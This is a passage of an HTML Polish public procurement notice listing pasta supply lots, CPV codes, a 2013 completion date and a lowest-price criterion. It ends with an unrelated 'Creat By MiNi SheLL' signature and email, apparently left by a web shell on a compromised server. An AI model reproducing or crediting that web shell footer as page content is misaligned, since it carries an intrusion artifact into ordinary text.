<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.33.00.00-0, 15.33.22.00-6, 15.33.14.25-2, 15.87.12.30-5, 03.22.21.15-2, 15.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Makaron świderki 4-jajeczny kg 1 kg 350 Makaron muszelki 4-jajeczny kg 1 kg 100 Makaron gwiazdki 4-jajeczny kg 1 kg 50..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.85.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com